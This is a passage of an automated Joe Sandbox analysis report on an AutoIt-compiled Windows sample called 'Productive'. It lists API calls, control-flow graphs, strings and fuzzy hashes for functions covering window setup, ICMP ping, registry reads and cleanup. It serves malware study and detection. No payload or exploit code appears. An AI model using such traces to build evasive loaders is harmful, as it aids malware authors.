                                                                                                                                                                • Sleep.KERNEL32(0000000A,?,?), ref: 002F36B5
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: MessagePeekSleepTimetime
                                                                                                                                                                • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$CALL
                                                                                                                                                                • API String ID: 1792118007-922114024
                                                                                                                                                                • Opcode ID: 05e41fd99b99a70bc1e66c46cf1c7db6ea70c34db26ad11d27b4404b3a5b44f2
                                                                                                                                                                • Instruction ID: 09c3837fb48aa08f2463731cf7bcf3763a756ed27bc5d639d87e17a966fa912a
                                                                                                                                                                • Opcode Fuzzy Hash: 05e41fd99b99a70bc1e66c46cf1c7db6ea70c34db26ad11d27b4404b3a5b44f2
                                                                                                                                                                • Instruction Fuzzy Hash: A6C2A170628342DFD729DF14C855BAAF7E4BF84384F14492DF58A972A1CBB0E964CB42

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                • GetSysColorBrush.USER32(0000000F), ref: 002B3444
                                                                                                                                                                • RegisterClassExW.USER32(00000030), ref: 002B346E
                                                                                                                                                                • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 002B347F
                                                                                                                                                                • InitCommonControlsEx.COMCTL32(?), ref: 002B349C
                                                                                                                                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 002B34AC
                                                                                                                                                                • LoadIconW.USER32(000000A9), ref: 002B34C2
                                                                                                                                                                • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 002B34D1
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                                                                • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                                                                • API String ID: 2914291525-1005189915
                                                                                                                                                                • Opcode ID: 61fa379c313c3d2f087188eec450a702a97ed94645c0860fe33c4895883a8c87
                                                                                                                                                                • Instruction ID: f7e8a12dd087c642ff2fc543d5e8c38d0b82845a6a19144ea2e6a1d360c3f07e
                                                                                                                                                                • Opcode Fuzzy Hash: 61fa379c313c3d2f087188eec450a702a97ed94645c0860fe33c4895883a8c87
                                                                                                                                                                • Instruction Fuzzy Hash: ED314771944309AFDB528FA4DC89AC9BFF8FF09310F10455AE694EA2A0D7B51581CF92

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                • GetSysColorBrush.USER32(0000000F), ref: 002B3444
                                                                                                                                                                • RegisterClassExW.USER32(00000030), ref: 002B346E
                                                                                                                                                                • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 002B347F
                                                                                                                                                                • InitCommonControlsEx.COMCTL32(?), ref: 002B349C
                                                                                                                                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 002B34AC
                                                                                                                                                                • LoadIconW.USER32(000000A9), ref: 002B34C2
                                                                                                                                                                • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 002B34D1
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                                                                • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                                                                • API String ID: 2914291525-1005189915
                                                                                                                                                                • Opcode ID: bbf17e5d842c924ccecf75593137e8b92dfb28a3ced0a3e58a991b1bea0b45e7
                                                                                                                                                                • Instruction ID: 38702da00a9bdc88693f648d775fa57421ecb8984c6affa18701a75643e80b25
                                                                                                                                                                • Opcode Fuzzy Hash: bbf17e5d842c924ccecf75593137e8b92dfb28a3ced0a3e58a991b1bea0b45e7
                                                                                                                                                                • Instruction Fuzzy Hash: 3221EAB5A54308AFDB12DF94EC49BDD7BF8FB09700F00411AF614AA2A0D7B11584CF91

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                • GetSysColorBrush.USER32(0000000F), ref: 002C5156
                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F00), ref: 002C5165
                                                                                                                                                                • LoadIconW.USER32(00000063), ref: 002C517C
                                                                                                                                                                • LoadIconW.USER32(000000A4), ref: 002C518E
                                                                                                                                                                • LoadIconW.USER32(000000A2), ref: 002C51A0
                                                                                                                                                                • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 002C51C6
                                                                                                                                                                • RegisterClassExW.USER32(?), ref: 002C521C
                                                                                                                                                                  • Part of subcall function 002B3411: GetSysColorBrush.USER32(0000000F), ref: 002B3444
                                                                                                                                                                  • Part of subcall function 002B3411: RegisterClassExW.USER32(00000030), ref: 002B346E
                                                                                                                                                                  • Part of subcall function 002B3411: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 002B347F
                                                                                                                                                                  • Part of subcall function 002B3411: InitCommonControlsEx.COMCTL32(?), ref: 002B349C
                                                                                                                                                                  • Part of subcall function 002B3411: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 002B34AC
                                                                                                                                                                  • Part of subcall function 002B3411: LoadIconW.USER32(000000A9), ref: 002B34C2
                                                                                                                                                                  • Part of subcall function 002B3411: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 002B34D1
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                                                                                • String ID: #$0$AutoIt v3
                                                                                                                                                                • API String ID: 423443420-4155596026
                                                                                                                                                                • Opcode ID: c61ffd4ac1caae77d282b828188e50cd1b2c7cbd721927605bf5d5dcfb7aa0d6
                                                                                                                                                                • Instruction ID: bb1283ea5aa6a6f258046fc46ba2c61f65bca2947db73c4e34d287acd69d6e0f
                                                                                                                                                                • Opcode Fuzzy Hash: c61ffd4ac1caae77d282b828188e50cd1b2c7cbd721927605bf5d5dcfb7aa0d6
                                                                                                                                                                • Instruction Fuzzy Hash: 0E214F74A54304AFDB269FA4ED09B9D7FF9FB08710F000519F618A62A1D7B66590CF84

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 852 325e1d-325e54 call 2b4dc0 855 325e56-325e63 call 2b502b 852->855 856 325e74-325e86 WSAStartup 852->856 855->856 863 325e65-325e70 call 2b502b 855->863 857 325e88-325e98 call 307135 856->857 858 325e9d-325edb call 2c40cd call 2b4d37 call 2c402a inet_addr gethostbyname 856->858 867 325ff6-325ffe 857->867 873 325eec-325efc call 307135 858->873 874 325edd-325eea IcmpCreateFile 858->874 863->856 879 325fed-325ff1 call 2c1cb6 873->879 874->873 876 325f01-325f32 call 2d0fe6 call 2c433f 874->876 884 325f34-325f53 IcmpSendEcho 876->884 885 325f55-325f69 IcmpSendEcho 876->885 879->867 886 325f6d-325f6f 884->886 885->886 887 325fa2-325fa4 886->887 888 325f71-325f76 886->888 889 325fa6-325fb2 call 307135 887->889 890 325fba-325fcc call 2b4dc0 888->890 891 325f78-325f7d 888->891 899 325fd4-325fe8 IcmpCloseHandle WSACleanup call 2c45ae 889->899 900 325fd2 890->900 901 325fce-325fd0 890->901 894 325fb4-325fb8 891->894 895 325f7f-325f84 891->895 894->889 895->887 898 325f86-325f8b 895->898 902 325f9a-325fa0 898->902 903 325f8d-325f92 898->903 899->879 900->899 901->899 902->889 903->894 905 325f94-325f98 903->905 905->889
                                                                                                                                                                APIs
                                                                                                                                                                • WSAStartup.WS2_32(00000101,?), ref: 00325E7E
                                                                                                                                                                • inet_addr.WSOCK32(?,?,?), ref: 00325EC3
                                                                                                                                                                • gethostbyname.WS2_32(?), ref: 00325ECF
                                                                                                                                                                • IcmpCreateFile.IPHLPAPI ref: 00325EDD
                                                                                                                                                                • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00325F4D
                                                                                                                                                                • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00325F63
                                                                                                                                                                • IcmpCloseHandle.IPHLPAPI(00000000), ref: 00325FD8
                                                                                                                                                                • WSACleanup.WSOCK32 ref: 00325FDE
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                                                                                                • String ID: Ping
                                                                                                                                                                • API String ID: 1028309954-2246546115
                                                                                                                                                                • Opcode ID: 52aa6627a3e6a0c346bb28c9a9b7ffa864f044a978e629380784c10e0ceca073
                                                                                                                                                                • Instruction ID: ca8c8e955c8abe8c61b19490c183217049d7c1ced0a37187a827a5ba63e43096
                                                                                                                                                                • Opcode Fuzzy Hash: 52aa6627a3e6a0c346bb28c9a9b7ffa864f044a978e629380784c10e0ceca073
                                                                                                                                                                • Instruction Fuzzy Hash: 80519C31604611EFD722EF24DD49B6AB7E8EF48710F154929FA95DB2A1DB70EA00CF42

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 906 2c4d83-2c4dd1 908 2c4e31-2c4e33 906->908 909 2c4dd3-2c4dd6 906->909 908->909 912 2c4e35 908->912 910 2c4dd8-2c4ddf 909->910 911 2c4e37 909->911 913 2c4ead-2c4eb5 PostQuitMessage 910->913 914 2c4de5-2c4dea 910->914 916 2c4e3d-2c4e40 911->916 917 3009c2-3009f0 call 2bc460 call 2bc483 911->917 915 2c4e1a-2c4e22 DefWindowProcW 912->915 922 2c4e61-2c4e63 913->922 918 300a35-300a49 call 312cce 914->918 919 2c4df0-2c4df2 914->919 921 2c4e28-2c4e2e 915->921 923 2c4e65-2c4e8c SetTimer RegisterWindowMessageW 916->923 924 2c4e42-2c4e43 916->924 952 3009f5-3009fc 917->952 918->922 943 300a4f 918->943 925 2c4df8-2c4dfd 919->925 926 2c4eb7-2c4ec1 call 2c5b29 919->926 922->921 923->922 927 2c4e8e-2c4e99 CreatePopupMenu 923->927 930 300965-300968 924->930 931 2c4e49-2c4e5c KillTimer call 2c5ac3 call 2b34e4 924->931 932 300a1a-300a21 925->932 933 2c4e03-2c4e08 925->933 945 2c4ec6 926->945 927->922 937 30096a-30096c 930->937 938 30099e-3009bd MoveWindow 930->938 931->922 932->915 940 300a27-300a30 call 308854 932->940 941 2c4e0e-2c4e14 933->941 942 2c4e9b-2c4eab call 2c5bd7 933->942 946 30098d-300999 SetFocus 937->946 947 30096e-300971 937->947 938->922 940->915 941->915 941->952 942->922 943->915 945->922 946->922 947->941 953 300977-300988 call 2bc460 947->953 952->915 956 300a02-300a15 call 2c5ac3 call 2c59d3 952->956 953->922 956->915
                                                                                                                                                                APIs
                                                                                                                                                                • DefWindowProcW.USER32(?,?,?,?), ref: 002C4E22
                                                                                                                                                                • KillTimer.USER32(?,00000001), ref: 002C4E4C
                                                                                                                                                                • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 002C4E6F
                                                                                                                                                                • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 002C4E7A
                                                                                                                                                                • CreatePopupMenu.USER32 ref: 002C4E8E
                                                                                                                                                                • PostQuitMessage.USER32(00000000), ref: 002C4EAF
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                                                                                • String ID: TaskbarCreated
                                                                                                                                                                • API String ID: 129472671-2362178303
                                                                                                                                                                • Opcode ID: bd57b30a89062ed854829bdfa03ceaad750bb1fce93939c725f86c91f8db0f7f
                                                                                                                                                                • Instruction ID: e2499e231bb183cec589e96e278fa8964962249234ac3fff09893337c1d6addc
                                                                                                                                                                • Opcode Fuzzy Hash: bd57b30a89062ed854829bdfa03ceaad750bb1fce93939c725f86c91f8db0f7f
                                                                                                                                                                • Instruction Fuzzy Hash: FC41D63127460AAADB2B7F24DC69FBB3659F741300F01072DF915951A3CBB5A8B09B62
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: fc913e7b131cbe37f5c058b059b2675820e8199cbc302a3aeb5dda3e0ee69926
                                                                                                                                                                • Instruction ID: da61159d525e051345878afd9403630c1bda5212fc1cca50777e7b5f658b21ea
                                                                                                                                                                • Opcode Fuzzy Hash: fc913e7b131cbe37f5c058b059b2675820e8199cbc302a3aeb5dda3e0ee69926
                                                                                                                                                                • Instruction Fuzzy Hash: F5324931AA02C6CFDB21CF6AC841BADBBB5AF46310FA84069D9559B3D1C7708C71CB60

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 1176 2bad98-2badd1 1177 2f2f63-2f2f64 DestroyWindow 1176->1177 1178 2badd7-2baded mciSendStringW 1176->1178 1181 2f2f6f-2f2f7c 1177->1181 1179 2badf3-2badfb 1178->1179 1180 2bafc0-2bafcd 1178->1180 1179->1181 1182 2bae01-2bae10 call 2bc71f 1179->1182 1183 2bafcf-2bafea UnregisterHotKey 1180->1183 1184 2baff2-2baff9 1180->1184 1186 2f2f7e-2f2f81 1181->1186 1187 2f2fab-2f2fb2 1181->1187 1195 2f2fb9-2f2fc5 1182->1195 1196 2bae16-2bae1e 1182->1196 1183->1184 1188 2bafec-2bafed call 2d0dd1 1183->1188 1184->1179 1189 2bafff 1184->1189 1192 2f2f8d-2f2f90 FindClose 1186->1192 1193 2f2f83-2f2f8b call 2c42cf 1186->1193 1187->1181 1190 2f2fb4 1187->1190 1188->1184 1189->1180 1190->1195 1198 2f2f96-2f2fa3 1192->1198 1193->1198 1199 2f2fcf-2f2fd6 1195->1199 1200 2f2fc7-2f2fc9 FreeLibrary 1195->1200 1201 2f2fdd-2f2fea 1196->1201 1202 2bae24-2bae49 call 2b4dc0 1196->1202 1198->1187 1204 2f2fa5-2f2fa6 call 31a20c 1198->1204 1199->1195 1205 2f2fd8 1199->1205 1200->1199 1207 2f2fec-2f3009 VirtualFree 1201->1207 1208 2f3011-2f3018 1201->1208 1213 2bae4b 1202->1213 1214 2bae80-2bae8b CoUninitialize 1202->1214 1204->1187 1205->1201 1207->1208 1211 2f300b-2f300c call 31a266 1207->1211 1208->1201 1212 2f301a 1208->1212 1211->1208 1216 2f301f-2f3022 1212->1216 1218 2bae4e-2bae7e call 2cfd60 call 2cfdf5 1213->1218 1214->1216 1217 2bae91-2bae96 1214->1217 1216->1217 1222 2f3028-2f302e 1216->1222 1219 2bae9c-2baea6 1217->1219 1220 2f3033-2f3040 call 31a240 1217->1220 1218->1214 1223 2baeac-2baf22 call 2c1cb6 call 2cfef1 call 2c4c0a call 2d052f call 2c1cb6 call 2b4dc0 call 2d0989 call 2d0b4f * 3 1219->1223 1224 2bb001-2bb00e call 2d0abc 1219->1224 1234 2f3042 1220->1234 1222->1217 1239 2f3047-2f3054 call 30d5cb 1223->1239 1269 2baf28-2baf3b call 2b13ae 1223->1269 1224->1223 1236 2bb014 1224->1236 1234->1239 1236->1224 1245 2f3056 1239->1245 1248 2f305b-2f3068 call 2d03e3 1245->1248 1254 2f306a 1248->1254 1257 2f306f-2f307c call 307236 1254->1257 1263 2f307e 1257->1263 1266 2f3083-2f3090 call 31a224 1263->1266 1272 2f3092 1266->1272 1269->1248 1274 2baf41-2baf49 1269->1274 1275 2f3097-2f30a4 call 31a224 1272->1275 1274->1257 1276 2baf4f-2baf6d call 2c1cb6 call 2c3868 1274->1276 1281 2f30a6 1275->1281 1276->1266 1284 2baf73-2baf81 1276->1284 1281->1281 1284->1275 1285 2baf87-2bafbf call 2c1cb6 * 3 call 2d0351 1284->1285
                                                                                                                                                                APIs
                                                                                                                                                                • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 002BADE1
                                                                                                                                                                • CoUninitialize.COMBASE ref: 002BAE80
                                                                                                                                                                • UnregisterHotKey.USER32(?), ref: 002BAFD7
                                                                                                                                                                • DestroyWindow.USER32(?), ref: 002F2F64
                                                                                                                                                                • FreeLibrary.KERNEL32(?), ref: 002F2FC9
                                                                                                                                                                • VirtualFree.KERNEL32(?,00000000,00008000), ref: 002F2FF6
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                                                                                                • String ID: close all
                                                                                                                                                                • API String ID: 469580280-3243417748
                                                                                                                                                                • Opcode ID: d5779113af695b99e91a4d223802eaacb864cd65d2da00d936de81f7bdbc7758
                                                                                                                                                                • Instruction ID: 569e897b3e1264a68da1f1906d3dc9dbbcc2477934684a2bb865ac8191875c3a
                                                                                                                                                                • Opcode Fuzzy Hash: d5779113af695b99e91a4d223802eaacb864cd65d2da00d936de81f7bdbc7758
                                                                                                                                                                • Instruction Fuzzy Hash: 12A15F30721212CFCB19EF14C595B79F764BF05780F1542ADE90A6B261CB31AD26CF51

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 1294 2c2fc5-2c30ea call 2e1b70 call 2c1207 call 2d00cf call 2d08c1 call 2c1900 call 2c4c94 call 2c1207 call 2c19e1 RegOpenKeyExW 1311 3001a3-3001be RegQueryValueExW 1294->1311 1312 2c30f0-2c310d call 2c1cb6 * 2 1294->1312 1314 3001c0-3001ff call 2d0fe6 call 2c433f RegQueryValueExW 1311->1314 1315 300235-300241 RegCloseKey 1311->1315 1328 300201-30021b call 2c1821 1314->1328 1329 30021d-300223 1314->1329 1315->1312 1317 300247-30024b 1315->1317 1320 300250-300276 call 2c1609 * 2 1317->1320 1335 300278-300286 call 2c1609 1320->1335 1336 30029b-3002a8 call 2d2e2c 1320->1336 1328->1329 1330 300233 1329->1330 1331 300225-300232 call 2d105c * 2 1329->1331 1330->1315 1331->1330 1335->1336 1344 300288-300299 call 2d2fbd 1335->1344 1346 3002aa-3002bb call 2d2e2c 1336->1346 1347 3002ce-300308 call 2c1a36 call 2c4c94 call 2c1cb6 call 2c1609 1336->1347 1354 30030e-30030f 1344->1354 1346->1347 1355 3002bd-3002cd call 2d2fbd 1346->1355 1347->1312 1347->1354 1354->1320 1355->1347
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 002D00CF: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,002C3094), ref: 002D00ED
                                                                                                                                                                  • Part of subcall function 002D08C1: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,002C309F), ref: 002D08E3
                                                                                                                                                                • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 002C30E2
                                                                                                                                                                • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 003001BA
                                                                                                                                                                • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 003001FB
                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00300239
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                                                                • Associated: 0000000D.00000002.19957638904.00000000002B0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000340000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957800682.0000000000366000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957888414.0000000000370000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                • Associated: 0000000D.00000002.19957922847.0000000000379000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2b0000_Productive.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: NameQueryValue$CloseFileFullModuleOpenPath
                                                                                                                                                                • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                                                                                                                • API String ID: 338900592-2727554177
                                                                                                                                                                • Opcode ID: 8ac26eee5d4b8b1aaa3c7f0f807a9daa841656e4418e2b79a34ea57da82a1851
                                                                                                                                                                • Instruction ID: c1a74050f78d37d638c595b5831a68e731439ec0758e14e702f1c85e594cea85
                                                                                                                                                                • Opcode Fuzzy Hash: 8ac26eee5d4b8b1aaa3c7f0f807a9daa841656e4418e2b79a34ea57da82a1851
                                                                                                                                                                • Instruction Fuzzy Hash: 24719E710553019AC316EF25D896A9BBBECFF45341F400A2EF449972B2EF309998CF52
                                                                                                                                                                APIs
                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 002E8335
                                                                                                                                                                • GetFileType.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 002E834F
                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 002E8372
                                                                                                                                                                • CloseHandle.KERNEL32(00000040,?,?,?,?,?,00000000,00000109), ref: 002E8384
                                                                                                                                                                • CloseHandle.KERNEL32(00000040,?,?,?,?,?,00000000,00000109), ref: 002E874A
                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 002E8776
                                                                                                                                                                  • Part of subcall function 002E0D0D: CloseHandle.KERNEL32(00000000,00340994,00000000,?,002E8449,00340994,?,?,?,?,?,?,?,?,00000000,00000109), ref: 002E0D5D
                                                                                                                                                                  • Part of subcall function 002E0D0D: GetLastError.KERNEL32(?,002E8449,00340994,?,?,?,?,?,?,?,?,00000000,00000109), ref: 002E0D67
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.19957666967.00000000002B1000.00000020.00000001.01000000.00000009.sdmp, Offset: 002B0000, based on PE: true
